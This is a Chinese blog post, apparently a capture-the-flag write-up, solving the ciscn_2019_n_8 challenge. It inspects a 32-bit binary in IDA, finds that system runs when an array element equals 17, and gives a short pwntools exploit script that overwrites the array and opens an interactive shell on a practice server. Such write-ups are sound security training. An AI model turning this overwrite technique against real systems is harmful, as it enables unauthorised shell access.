ciscn_2019_n_8

本文介绍了如何通过IDA反编译工具分析32位程序,该程序启用了Canary保护。作者在主函数中发现了系统调用的线索,特别是当变量值为17时会触发`system`函数。因此,通过填充17来尝试执行特定行为。最终,使用Python的`pwn`库发送数据到远程服务器并进入交互模式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


一、查看文件

在这里插入图片描述
在这里插入图片描述
32位,开启了Canary保护。


二、IDA反编译

啥也不清楚,就老办法,拖入IDA进行反编译:
在这里插入图片描述
感觉主函数中给的线索比较清晰,系统调用函数就在主函数中,看带代码是当var[13]==17LL时候执行system函数。

所以我们可以把17填充进去

三、代码

from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",25456)
p=p32(17)*14
r.sendline(p)
r.interactive()


在这里插入图片描述
在这里插入图片描述在这里插入图片描述


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值